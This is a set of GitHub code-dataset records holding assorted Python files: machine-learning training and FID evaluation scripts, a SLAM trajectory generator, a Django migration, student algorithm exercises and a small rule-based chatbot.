feat1.to(args.device)\n feat2 = feat2.to(args.device)\n\n z1, z2 = model(graph1, feat1, graph2, feat2)\n\n c = th.mm(z1.T, z2)\n c1 = th.mm(z1.T, z1)\n c2 = th.mm(z2.T, z2)\n\n c = c / N\n c1 = c1 / N\n c2 = c2 / N\n\n loss_inv = -th.diagonal(c).sum()\n iden = th.tensor(np.eye(c.shape[0])).to(args.device)\n loss_dec1 = (iden - c1).pow(2).sum()\n loss_dec2 = (iden - c2).pow(2).sum()\n\n loss = loss_inv + args.lambd * (loss_dec1 + loss_dec2)\n\n loss.backward()\n optimizer.step()\n\n print('Epoch={:03d}, loss={:.4f}'.format(epoch, loss.item()))\n\n print(\"=== Evaluation ===\")\n graph = graph.to(args.device)\n graph = graph.remove_self_loop().add_self_loop()\n feat = feat.to(args.device)\n\n embeds = model.get_embedding(graph, feat)\n\n train_embs = embeds[train_idx]\n val_embs = embeds[val_idx]\n test_embs = embeds[test_idx]\n\n label = labels.to(args.device)\n\n train_labels = label[train_idx]\n val_labels = label[val_idx]\n test_labels = label[test_idx]\n\n train_feat = feat[train_idx]\n val_feat = feat[val_idx]\n test_feat = feat[test_idx]\n\n ''' Linear Evaluation '''\n logreg = LogReg(train_embs.shape[1], num_class)\n opt = th.optim.Adam(logreg.parameters(), lr=args.lr2, weight_decay=args.wd2)\n\n logreg = logreg.to(args.device)\n loss_fn = nn.CrossEntropyLoss()\n\n best_val_acc = 0\n eval_acc = 0\n\n for epoch in range(2000):\n logreg.train()\n opt.zero_grad()\n logits = logreg(train_embs)\n preds = th.argmax(logits, dim=1)\n train_acc = th.sum(preds == train_labels).float() / train_labels.shape[0]\n loss = loss_fn(logits, train_labels)\n loss.backward()\n opt.step()\n\n logreg.eval()\n with th.no_grad():\n val_logits = logreg(val_embs)\n test_logits = logreg(test_embs)\n\n val_preds = th.argmax(val_logits, dim=1)\n test_preds = th.argmax(test_logits, dim=1)\n\n val_acc = th.sum(val_preds == val_labels).float() / val_labels.shape[0]\n test_acc = th.sum(test_preds == test_labels).float() / test_labels.shape[0]\n\n if val_acc >= best_val_acc:\n 
best_val_acc = val_acc\n if test_acc > eval_acc:\n eval_acc = test_acc\n\n print('Epoch:{}, train_acc:{:.4f}, val_acc:{:4f}, test_acc:{:4f}'.format(epoch, train_acc, val_acc, test_acc))\n\n print('Linear evaluation accuracy:{:.4f}'.format(eval_acc))\n","repo_name":"hengruizhang98/CCA-SSG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"78"} +{"seq_id":"4241292836","text":"from collections import Counter\r\n# This signature is required for the automated grading to work.\r\n# Do not rename the function or change its list of parameters!\r\ndef min_domino_rotations(top, bottom):\r\n\r\n top_dict = {index: item for index, item in enumerate(top)}\r\n btm_dict = {index: item for index, item in enumerate(bottom)}\r\n # print(top_dict)\r\n # print(btm_dict)\r\n\r\n combined_dict = {}\r\n for key in top_dict.keys() | btm_dict.keys():\r\n combined_dict[key] = [top_dict.get(key, None), btm_dict.get(key, None)]\r\n common_numbers = set(combined_dict[0])\r\n for key in combined_dict:\r\n common_numbers = common_numbers.intersection(set(combined_dict[key]))\r\n # Check if it's possible to complete or not\r\n if len(common_numbers) == 0:\r\n return -1\r\n common_number_list = []\r\n for element in common_numbers:\r\n common_number_list.append(element)\r\n\r\n temp_lists = [0] * len(common_number_list)\r\n for number in common_number_list:\r\n index = 0\r\n for value in top_dict.values():\r\n if value != number:\r\n temp_lists[index] += 1\r\n index += 1\r\n\r\n temp2_lists = [0] * len(common_number_list)\r\n for number in common_number_list:\r\n index = 0\r\n for value in btm_dict.values():\r\n if value != number:\r\n temp2_lists[index] += 1\r\n index += 1\r\n\r\n # print(temp_lists)\r\n # print(temp2_lists)\r\n\r\n combined_list = temp_lists + temp2_lists\r\n answer = min(combined_list)\r\n \r\n return answer\r\n\r\n# The following line calls the function which will print # value to the Console.\r\n# This way you can check what it does.\r\n# However, we encourage you to write tests, because then you\r\n# can easily test many different values on every \"Test & Run\"!\r\n\r\nprint(min_domino_rotations([2, 6, 2, 1, 2, 2], [5, 2, 4, 2, 3, 2]))\r\nprint(min_domino_rotations([3, 5, 1, 2, 6], [3, 6, 3, 3, 6]))\r\n\r\n# [2, 6, 2, 1, 2, 2]\r\n# [5, 2, 4, 2, 3, 2]","repo_name":"Pyrexiaa/UZH_Informatics_Answers","sub_path":"assignment_5/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35791627580","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0014_auto_20160404_1908'),\n ('djangocms_repeater', '0013_singleheader'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Button',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(parent_link=True, serialize=False, primary_key=True, to='cms.CMSPlugin', auto_created=True)),\n ('buttonText', models.CharField(max_length=100, default='Button Text')),\n ('buttonURL', models.URLField()),\n ('buttonColour', models.CharField(max_length=10, default='blue', choices=[('teal', 'Teal'), ('orange', 'Orange'), ('red', 'Red'), ('blue', 'Blue')])),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n 
]\n","repo_name":"womenhackfornonprofits/seo-london","sub_path":"djangocms_repeater/migrations/0014_button.py","file_name":"0014_button.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"26183004069","text":"import os\nimport sys\nimport argparse\nimport numpy as np\nimport logging\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport torch\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport frechet_inception_distance as FID\n\nsys.path.insert(0, './../source')\nfrom utils_celeba_gender import mkdir\nfrom CelebA import MyCelebA\n\nImg_W = Img_H = 32\nImg_C = 3\nDATA_ROOT = './../data'\nSTAT_DIR = './stats'\n\n\n#############################################################################################################\n# get and save the arguments\n#############################################################################################################\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', '-data', type=str, default='celeba', choices=['celeba'],\n help=' dataset name')\n parser.add_argument('--gen_data', type=str,\n default='./../results/celeba_gender/main/ResNet_default/gen_data.npz',\n help='path of file that store the generated data')\n parser.add_argument('--save_dir', type=str,\n help='output folder name; will be automatically save to the folder of gen_data if not specified')\n parser.add_argument('--num_eval_samples', type=int, default=20000,\n help=\"number of samples to be evaluated\")\n args = parser.parse_args()\n return args\n\n\n##########################################################################\n### helper functions\n##########################################################################\ndef convert_data(data, Img_W, Img_H, Img_C):\n shape = data.shape\n if len(shape) == 2:\n data = np.reshape(data, [-1, Img_W, Img_H, Img_C])\n elif len(shape) == 3:\n data = np.reshape(data, [-1, Img_W, Img_H, Img_C])\n elif len(shape) == 4:\n if shape[1] == Img_C:\n data = np.transpose(data, [0, 2, 3, 1])\n\n if Img_C == 1:\n data = np.tile(data, [1, 1, 1, 3])\n return data * 255\n\ndef inf_train_gen(trainloader):\n while True:\n for images, targets in trainloader:\n yield (images, targets)\n\ndef load_celeba(selection='train_val'):\n transform_train_celeba = transforms.Compose([transforms.Resize((32,32)), transforms.ToTensor()])\n dataloader = MyCelebA\n \n if selection == 'train':\n trainset = dataloader(root=DATA_ROOT, split='train', download=False, transform=transform_train_celeba)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=len(trainset), drop_last=False, shuffle=False)\n input_data = inf_train_gen(trainloader)\n real_data, real_y = next(input_data)\n x = real_data.cpu().detach().numpy()\n y = real_y.cpu().detach().numpy()\n \n elif selection == 'train_val':\n trainset = dataloader(root=DATA_ROOT, split='train', download=False, transform=transform_train_celeba)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=len(trainset), drop_last=False, shuffle=False)\n input_data_train = inf_train_gen(trainloader)\n real_data_train, real_y_train = next(input_data_train)\n x_train = real_data_train.cpu().detach().numpy()\n y_train = real_y_train.cpu().detach().numpy() \n\n valset 
= dataloader(root=DATA_ROOT, split='valid', download=False, transform=transform_train_celeba)\n valloader = torch.utils.data.DataLoader(valset, batch_size=len(valset), drop_last=False, shuffle=False)\n input_data_val = inf_train_gen(valloader)\n real_data_val, real_y_val = next(input_data_val)\n x_val = real_data_val.cpu().detach().numpy()\n y_val = real_y_val.cpu().detach().numpy() \n \n x = np.concatenate([x_train, x_val])\n y = np.concatenate([y_train, y_val])\n \n elif selection == 'test':\n testset = dataloader(root=DATA_ROOT, split='test', download=False, transform=transform_train_celeba)\n testloader = torch.utils.data.DataLoader(testset, batch_size=len(testset), drop_last=False, shuffle=False)\n input_data = inf_train_gen(testloader)\n real_data, real_y = next(input_data)\n x = real_data.cpu().detach().numpy()\n y = real_y.cpu().detach().numpy()\n \n elif selection == 'val':\n valset = dataloader(root=DATA_ROOT, split='valid', download=False, transform=transform_train_celeba)\n valloader = torch.utils.data.DataLoader(valset, batch_size=len(valset), drop_last=False, shuffle=False)\n input_data = inf_train_gen(valloader)\n real_data, real_y = next(input_data)\n x = real_data.cpu().detach().numpy()\n y = real_y.cpu().detach().numpy()\n \n print('data shape', x.shape, y.shape)\n print('data range:', np.min(x), np.max(x))\n return x, y\n\n##########################################################################\n### main\n##########################################################################\ndef main(args):\n ### Get real data statistics\n stat_file = os.path.join(STAT_DIR, args.dataset, 'stat.npz')\n if not os.path.exists(stat_file):\n if args.dataset == 'celeba':\n real_data, _ = load_celeba('train_val')\n real_data = convert_data(real_data, Img_W, Img_H, Img_C)\n m1, s1, real_act = FID.calculate_activation(real_data)\n\n ## Save real statistics\n mkdir(os.path.join(STAT_DIR, args.dataset))\n np.savez(stat_file, mu=m1, sigma=s1, real_act=real_act)\n else:\n ## Load pre-computed statistics\n f = np.load(stat_file)\n m1, s1 = f['mu'][:], f['sigma'][:]\n real_act = f['real_act']\n print(m1.shape)\n print(s1.shape)\n print(real_act.shape)\n\n ### load gen data\n gen_data = np.load(args.gen_data)\n x_gen = gen_data['data_x']\n x_gen = convert_data(x_gen, Img_W, Img_H, Img_C)\n rand_perm = np.random.permutation(len(x_gen))\n x_gen = x_gen[rand_perm]\n x_gen = x_gen[:args.num_eval_samples]\n print(x_gen.shape)\n print(np.min(x_gen), np.max(x_gen))\n\n ### Get fake data statistics and compute FID\n m2, s2, fake_act = FID.calculate_activation(x_gen)\n fid_value = FID.calculate_frechet_distance(m1, s1, m2, s2)\n infostr = 'fid value: {}'.format(fid_value)\n print(infostr)\n\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n main(args)\n","repo_name":"chenchen-usyd/DP-GAN-DPAC","sub_path":"evaluation/eval_celeba_fid.py","file_name":"eval_celeba_fid.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31142306894","text":"import numpy as np\nfrom torch.utils.data import IterableDataset\nimport zarr\n\n\nclass PlanarCubeLatentDataset(IterableDataset):\n def __init__(self, zarr_path: str):\n data = zarr.open(zarr_path)\n self._states = np.asarray(data.states)\n self._latents = np.asarray(data.latents)\n\n def __len__(self):\n return len(self._states)\n\n def __iter__(self, override_idx=None):\n while True:\n idx = (\n override_idx\n if override_idx is not None\n else 
np.random.randint(0, len(self._states))\n )\n yield self._latents[idx], self._states[idx]\n","repo_name":"nepfaff/state_encoder_3d","sub_path":"state_encoder_3d/dataset/planar_cube_latent_dataset.py","file_name":"planar_cube_latent_dataset.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3227065859","text":"from sys import argv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport bz2\nfrom tqdm import tqdm as tm\nfrom scipy.spatial.transform import Rotation as R\nimport gtsam \n\ndef get_traj():\n X, Y, Z = [50], [50], [50]\n length = 10\n poses = 20\n step = float(length)/poses\n for idx in range(5):\n for _ in range(1,poses):\n X.append(X[len(X)-1])\n Y.append(Y[len(Y)-1])\n Z.append(Z[len(Z)-1])\n if idx==0:\n X[len(X)-1] = X[len(X)-1] + step\n elif idx==1:\n Y[len(Y)-1] = Y[len(Y)-1] + step\n elif idx==2:\n Z[len(Z)-1] = Z[len(Z)-1] - step\n elif idx==3:\n X[len(X)-1] = X[len(X)-1] - step\n elif idx==4:\n Z[len(Z)-1] = Z[len(Z)-1] + step\n \n LT = [np.eye(4)]\n LT[0][:3,:3] = R.from_euler('y',90, True).as_matrix()\n LT[0][:3,3] = np.array([X[0],Y[0],Z[0]])\n for idx in range(5):\n for _ in range(1, poses):\n lt_idx = len(LT)-1\n LT.append(np.array(LT[len(LT)-1]))\n lt_idx = len(LT)-1\n LT[lt_idx][:3,3] = np.array([X[lt_idx],Y[lt_idx],Z[lt_idx]])\n rot = np.eye(4)\n if idx==0:\n axis = 'x'\n deg = 270\n elif idx==1:\n axis='y'\n deg = 90\n elif idx==2:\n axis='x'\n deg = 270\n elif idx==3:\n axis='x'\n deg = 270\n elif idx==4:\n axis='y'\n deg = 90 \n rot[:3,:3] = R.from_euler(axis,deg, True).as_matrix()\n LT[len(LT)-1] = LT[len(LT)-1] @ rot\n \n Qx, Qy, Qz, Qw = [], [], [], []\n for T in LT:\n [qx, qy, qz, qw] = R.from_matrix(T[:3,:3]).as_quat()\n Qx.append(qx)\n Qy.append(qy)\n Qz.append(qz)\n Qw.append(qw)\n \n val = 2\n LDMK = [\n [X[(poses-1)]+np.random.uniform(val,1.5*val), Y[(poses-1)]+np.random.uniform(-val,val), Z[(poses-1)]+np.random.uniform(-val,val)],\n [X[2*(poses-1)]+np.random.uniform(-val,val), Y[2*(poses-1)]+np.random.uniform(val,1.5*val), Z[2*(poses-1)]+np.random.uniform(-val,val)],\n [X[3*(poses-1)]+np.random.uniform(-val,val), Y[3*(poses-1)]+np.random.uniform(-val,val), Z[3*(poses-1)]+np.random.uniform(-1.5*val,-val)],\n [X[4*(poses-1)]+np.random.uniform(-1.5*val,-val), Y[4*(poses-1)]+np.random.uniform(-val,val), Z[4*(poses-1)]+np.random.uniform(-val,val)],\n [X[5*(poses-1)]+np.random.uniform(-val,val), Y[5*(poses-1)]+np.random.uniform(-val,val), Z[5*(poses-1)]+np.random.uniform(val,1.5*val)],\n # [X[6*(poses-1)]+np.random.uniform(-val,val), Y[6*(poses-1)]+np.random.uniform(-1.5*val,-val), Z[6*(poses-1)]+np.random.uniform(-val,val)],\n ]\n\n\n K = gtsam.Cal3_S2(565.6008952774197, 565.6008952774197, 1000.0 ,320.5, 240.5 )\n measurement = []\n for idx in range(len(X)):\n if idx < (poses-1):\n lidx = 0\n elif idx<2*(poses-1):\n lidx=1\n elif idx<3*(poses-1):\n lidx=2\n elif idx<4*(poses-1):\n lidx=3\n elif idx<5*(poses-1):\n lidx=4\n else:\n break\n \n camera = gtsam.PinholeCameraCal3_S2(gtsam.Pose3(LT[idx]),K)\n point = LDMK[lidx]\n measurement.append([idx, lidx, *camera.project(point)])\n return X, Y, Z, Qx, Qy, Qz, Qw, LDMK, measurement\n\ndef add_noise_ldmk(ldmk):\n noise_ldmk = []\n for idx, L in enumerate(ldmk):\n noise_ldmk.append([\n L[0]+ np.random.uniform(-4,4),\n L[1]+ np.random.uniform(-4,4),\n L[2]+ np.random.uniform(-4,4),\n ])\n return noise_ldmk\n\ndef write_initialisation(filepath, xN, yN, zN, QxN, QyN, QzN, QwN, LDMK, measurements):\n with 
open(filepath, 'w') as data_file:\n line = str(len(xN)) + ' ' + str(len(LDMK)) + ' ' + str(len(measurements)) + '\\n';\n data_file.write(line);\n for i in range(len(xN)):\n line = str(xN[i]) + ' ' + str(yN[i]) + ' ' + str(zN[i]) + ' ' + str(QxN[i]) + ' ' + str(QyN[i]) + ' ' + str(QzN[i]) + ' ' + str(QwN[i]) + '\\n';\n data_file.write(line);\n for i in range(len(LDMK)):\n line = str(LDMK[i][0]) + ' ' + str(LDMK[i][1]) + ' ' + str(LDMK[i][2]) + '\\n';\n data_file.write(line);\n for i in range(len(measurements)):\n line = str(measurements[i][0]) + ' ' + str(measurements[i][1]) + ' ' + str(measurements[i][2]) + ' ' + str(measurements[i][3]) + '\\n';\n data_file.write(line);\n\ndef read_bal_data(file_name):\n with bz2.open(file_name, \"rt\") as file:\n n_cameras, n_points, n_observations = map(\n int, file.readline().split())\n\n camera_indices = np.empty(n_observations, dtype=int)\n point_indices = np.empty(n_observations, dtype=int)\n points_2d = np.empty((n_observations, 2))\n\n for i in range(n_observations):\n camera_index, point_index, x, y = file.readline().split()\n camera_indices[i] = int(camera_index)\n point_indices[i] = int(point_index)\n points_2d[i] = [float(x), float(y)]\n\n camera_params = np.empty(n_cameras * 9)\n for i in range(n_cameras * 9):\n camera_params[i] = float(file.readline())\n camera_params = camera_params.reshape((n_cameras, -1))\n\n points_3d = np.empty(n_points * 3)\n for i in range(n_points * 3):\n points_3d[i] = float(file.readline())\n points_3d = points_3d.reshape((n_points, -1))\n\n return camera_params, points_3d, camera_indices, point_indices, points_2d\n\ndef rotation_matrix(rot_vec):\n theta = np.linalg.norm(rot_vec)\n with np.errstate(invalid='ignore'):\n v = rot_vec / theta\n v = np.nan_to_num(v)\n cos_theta = np.cos(theta)\n sin_theta = np.sin(theta)\n [v1, v2, v3] = v\n cross_product_mat = np.array([\n [0, -v3, v2],\n [v3, 0, -v1],\n [-v2, v1, 0],\n ])\n rot = cos_theta * np.eye(3)\n rot = rot + sin_theta*cross_product_mat\n rot = rot + (1-cos_theta)*(np.outer(v,v))\n return rot\n \ndef get_poses(r_list, t_list):\n X, Y, Z, Qx, Qy, Qz, Qw = [], [], [], [], [], [], []\n for idx in range(len(r_list)):\n rot_vec = r_list[idx]\n t_vec = t_list[idx]\n X.append(t_vec[0])\n Y.append(t_vec[1])\n Z.append(t_vec[2])\n # R = rotation_matrix(rot_vec)\n [qx, qy, qz, qw] = R.from_rotvec(rot_vec).as_quat()\n Qx.append(qx)\n Qy.append(qy)\n Qz.append(qz)\n Qw.append(qw)\n return X, Y, Z, Qx, Qy, Qz, Qw\n\ndef addNoise(X, Y, Z, Qx, Qy, Qz, Qw):\n\tXN = np.zeros(len(X)); YN = np.zeros(len(Y)); ZN = np.zeros(len(Z))\n\tQxN = np.zeros(len(Qx)); QyN = np.zeros(len(Qy)); QzN = np.zeros(len(Qz)); QwN = np.zeros(len(Qw))\n\n\tXN[0] = X[0]; YN[0] = Y[0]; ZN[0] = Z[0]; QxN[0] = Qx[0]; QyN[0] = Qy[0]; QzN[0] = Qz[0]; QwN[0] = Qw[0]\n\n\tfor i in range(1, len(X)):\n\t\t# Get T2_1\n\t\tp1 = (X[i-1], Y[i-1], Z[i-1], Qx[i-1], Qy[i-1], Qz[i-1], Qw[i-1])\n\t\tp2 = (X[i], Y[i], Z[i], Qx[i], Qy[i], Qz[i], Qw[i])\n\n\t\tR1_w = R.from_quat([p1[3], p1[4], p1[5], p1[6]]).as_matrix()\n\t\tR2_w = R.from_quat([p2[3], p2[4], p2[5], p2[6]]).as_matrix()\n\n\t\tT1_w = np.identity(4)\n\t\tT2_w = np.identity(4)\n\n\t\tT1_w[0:3, 0:3] = R1_w\n\t\tT2_w[0:3, 0:3] = R2_w\n\n\t\tT1_w[0, 3] = p1[0] \n\t\tT1_w[1, 3] = p1[1]\n\t\tT1_w[2, 3] = p1[2]\n\n\t\tT2_w[0, 3] = p2[0]\n\t\tT2_w[1, 3] = p2[1]\n\t\tT2_w[2, 3] = p2[2]\n\n\t\tT2_1 = np.dot(np.linalg.inv(T1_w), T2_w)\n\n\t\tdx, dy, dz = T2_1[0, 3], T2_1[1, 3], T2_1[2, 3]\n\t\tdyaw, dpitch, droll = list(R.from_matrix(T2_1[0:3, 
0:3]).as_euler('zyx'))\n\t\t\n\t\t# Add noise\n\t\tif(i<5):\n\t\t\txNoise = 0; yNoise = 0; zNoise = 0; rollNoise = 0; pitchNoise = 0; yawNoise = 0\n\t\telse:\n\t\t\txNoise = 0; yNoise = 0; zNoise = 0; rollNoise = 0.005; pitchNoise = 0.005; yawNoise = 0.005\n\n\t\tdx += xNoise; dy += yNoise; dz += zNoise\n\t\tdyaw += yawNoise; dpitch += pitchNoise; droll += rollNoise\n\n\t\t# Convert to T2_1'\n\t\tR2_1N = R.from_euler('zyx', [dyaw, dpitch, droll]).as_matrix()\n\t\t\n\t\tT2_1N = np.identity(4)\n\t\tT2_1N[0:3, 0:3] = R2_1N\n\n\t\tT2_1N[0, 3] = dx\n\t\tT2_1N[1, 3] = dy\n\t\tT2_1N[2, 3] = dz\n\n\t\t# Get T2_w' = T1_w' . T2_1'\n\t\tp1 = (XN[i-1], YN[i-1], ZN[i-1], QxN[i-1], QyN[i-1], QzN[i-1], QwN[i-1])\n\t\tR1_wN = R.from_quat([p1[3], p1[4], p1[5], p1[6]]).as_matrix()\n\t\t\n\t\tT1_wN = np.identity(4)\n\t\tT1_wN[0:3, 0:3] = R1_wN\n\n\t\tT1_wN[0, 3] = p1[0] \n\t\tT1_wN[1, 3] = p1[1]\n\t\tT1_wN[2, 3] = p1[2]\n\n\t\tT2_wN = np.dot(T1_wN, T2_1N)\n\n\t\t# Get x2', y2', z2', qx2', qy2', qz2', qw2'\n\t\tx2N, y2N, z2N = T2_wN[0, 3], T2_wN[1, 3], T2_wN[2, 3]\n\t\tqx2N, qy2N, qz2N, qw2N = list(R.from_matrix(T2_wN[0:3, 0:3]).as_quat())\n\n\t\tXN[i] = x2N; YN[i] = y2N; ZN[i] = z2N\n\t\tQxN[i] = qx2N; QyN[i] = qy2N; QzN[i] = qz2N; QwN[i] = qw2N\n\n\treturn (XN, YN, ZN, QxN, QyN, QzN, QwN)\n\n\n\nif __name__==\"__main__\":\n \n X, Y, Z, Qx, Qy, Qz, Qw, LDMK, measurement = get_traj()\n xN, yN, zN, QxN, QyN, QzN, QwN = addNoise(X, Y, Z, Qx, Qy, Qz, Qw)\n noise_ldmk = add_noise_ldmk(LDMK)\n \n write_initialisation(argv[1], X, Y, Z, Qx, Qy, Qz, Qw, LDMK, measurement)\n write_initialisation(argv[2], xN, yN, zN, QxN, QyN, QzN, QwN , noise_ldmk, measurement)","repo_name":"ayushsharma-crypto/SLAM-BO-G2O-GTSAM","sub_path":"Tutorial/gtsamFullSLAM_SE3/gen_info.py","file_name":"gen_info.py","file_ext":"py","file_size_in_byte":9113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39824357217","text":"from math import cos\r\n\r\nCONST = 100\r\n\r\ndef cosinus(x):\r\n # Maclaurin series: cos(x) = sum over n of (-1)^n * x^(2n) / (2n)!\r\n res = 0\r\n x_st = 1\r\n n_factorial = 1\r\n \r\n for n in range(0,CONST):\r\n if n == 0:\r\n res+=1\r\n else:\r\n x_st *= x**2\r\n if n == 1:\r\n n_factorial = 2\r\n else:\r\n n_factorial *= (2*n - 1) * (2*n) # extend (2n-2)! to (2n)!\r\n res += (((-1)**n)/n_factorial) * x_st\r\n return res\r\n\r\nprint(cosinus(0.75))\r\nprint(cos(0.75))\r\n","repo_name":"Lammer322by/Hello-World","sub_path":"Autumn/custom_cosinus.py","file_name":"custom_cosinus.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11390414309","text":"import torch\nfrom torch import nn\n\nclass CnnModel(nn.Module):\n def __init__(self):\n super(CnnModel, self).__init__()\n # 첫번째층\n # ImgIn shape=(?, 28, 28, 1)\n # Conv -> (?, 28, 28, 32)\n # Pool -> (?, 14, 14, 32)\n self.layer1 = torch.nn.Sequential(\n torch.nn.Conv2d(1, 32, kernel_size=3, stride=1, padding=1),\n torch.nn.ReLU(),\n torch.nn.MaxPool2d(kernel_size=2, stride=2))\n\n # 두번째층\n # ImgIn shape=(?, 14, 14, 32)\n # Conv ->(?, 14, 14, 64)\n # Pool ->(?, 7, 7, 64)\n self.layer2 = torch.nn.Sequential(\n torch.nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1),\n torch.nn.ReLU(),\n torch.nn.MaxPool2d(kernel_size=2, stride=2))\n\n # 전결합층 7x7x64 inputs -> 10 outputs\n self.fc = torch.nn.Linear(7 * 7 * 64, 10, bias=True)\n\n # 전결합층 한정으로 가중치 초기화\n torch.nn.init.xavier_uniform_(self.fc.weight)\n\n # # 전결합층 한정으로 가중치 초기화\n # torch.nn.init.xavier_uniform_(self.fc.weight)\n\n def forward(self, x):\n out = 
self.layer1(x)\n out = self.layer2(out)\n\n # 전결합층을 위해서 Flatten\n out = out.view(out.size(0), -1) \n\n # 전결합층 Fully Connected\n out = self.fc(out)\n \n return out","repo_name":"donghquinn/cnn_mnist_test","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17350666073","text":"def troca(l, i, j):\n aux = l[i]\n l[i] = l[j]\n l[j] = aux\n\n\ndef perms(l, pos=0):\n if pos == len(l) - 1:\n print(l)\n else:\n for i in range(pos, len(l)):\n troca(l, pos, i)\n perms(l, pos+1)\n troca(l, pos, i)\n\n\ndef main():\n l = [1, 2, 3]\n perms(l)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"matheustxaguiar/Programming-Period-2","sub_path":"Recursive Functions/permutacao.py","file_name":"permutacao.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7552881892","text":"# \t30616KB\t148ms\na = [0]*8\nused = [False]*9\ndef func(n, m, cnt):\n if m == cnt:\n print(' '.join(map(str, a[0:m])))\n for i in range(1, n+1):\n if used[i]:\n continue\n used[i] = True\n a[cnt] = i\n func(n, m, cnt+1)\n used[i] = False\nn, m = map(int, input().split())\nfunc(n, m, 0)","repo_name":"lilble/baekjoon","sub_path":"15649/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42939845213","text":"# userInput = input(\"Insert you name: \")\n# welcomeMessage = f\"Welcome to my store {userInput} here is the list of our items\"\n# lengthMessage = len(welcomeMessage)\n# print(\"*\"*lengthMessage)\n# print(welcomeMessage)\n# list = \"a.Fruits\\nb.Dairy\\nc.Spices\\nd.Paper Wrap\\nc.Toiletry\\nd.Vegetables\\ne.Frozen Food\\nf.Canned Goods\\ng.Pet Items\" \\\n# \"\\nh.Household\\ni.Cereal\\nj.Pasta/Rice\\nk.Breads\\nl.Baking\\nm.Beverages\\nn.Meat/Fish\\no.Condiments\\np.Sauces/Oils\\nq.Snacks\"\n# print(list)\nimport re\nimport long_response as long\ndef message_probability(user_message,recognised_words, single_response=False, required_words=[]):\n message_certainty = 0\n has_required_words = True\n\n for word in user_message:\n if word in recognised_words:\n message_certainty += 1\n percentage = float(message_certainty) / float(len(recognised_words))\n\n for word in required_words:\n if word not in user_message:\n has_required_words = False\n break\n\n if has_required_words or single_response:\n return int(percentage*100)\n else:\n return 0\n\ndef check_all_messages(message):\n highest_prob_list = {}\n\n def response(bot_response, list_of_words, single_response = False, required_words ={}):\n nonlocal highest_prob_list\n highest_prob_list[bot_response] = message_probability(message, list_of_words, single_response, required_words)\n\n response('Hello!', ['hello', 'hi', 'sup', 'hey', 'heyo'], single_response = True)\n response('I\\'m doing fine, and you?', ['how', 'are', 'you', 'doing'], required_words=['how'])\n\n best_match = max(highest_prob_list, key=highest_prob_list.get)\n print(highest_prob_list)\n\n return best_match\n\ndef get_response(user_input):\n split_message = re.split(r'\\s+|[,;?!.-]\\s*', user_input.lower())\n response = check_all_messages(split_message)\n return response\n\nwhile True:\n print('Bot: ' + get_response(input('You: 
')))","repo_name":"Yawner23/chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34683014015","text":"from os import system\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef koszon(nev:str, napszak:str) -> None:\r\n print(f'Szia {nev}!')\r\n valasz:str = input(f'Hogy vagy ma {napszak}?')\r\n if 'jól' in valasz:\r\n print(f'Na az jó {nev}!')\r\n elif 'szarul' in valasz:\r\n print(f'Az szar, {nev} :(')\r\n else: print('ok')\r\n\r\n\r\ndef kerdes() -> bool: \r\n rszam:int = randint(1, 10)\r\n ered:int = int(input(f'Mennyi {rszam} négyzete? '))\r\n if rszam ** 2 == ered:\r\n return True\r\n else:\r\n return False\r\n\r\ndef befejezes(nev:str) -> None:\r\n print(f'Rendben {nev}, mára végeztünk!')\r\n print('Viszontlátásra! ')\r\n for x in range(3):\r\n print(end=f'{3 - x}')\r\n for y in range(3):\r\n print(end= '.')\r\n sleep(.5)\r\n system('cls')\r\n\r\n","repo_name":"MarkCsiha/practice","sub_path":"0421_python/Új mappa/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74006219452","text":"import bs4\nimport requests\nimport re\nimport time\nimport pymongo\nimport guessit\nfrom configparser import ConfigParser\nimport help_routines\n\nparser = ConfigParser()\nparser.read('config.ini')\n\ncategory_list = 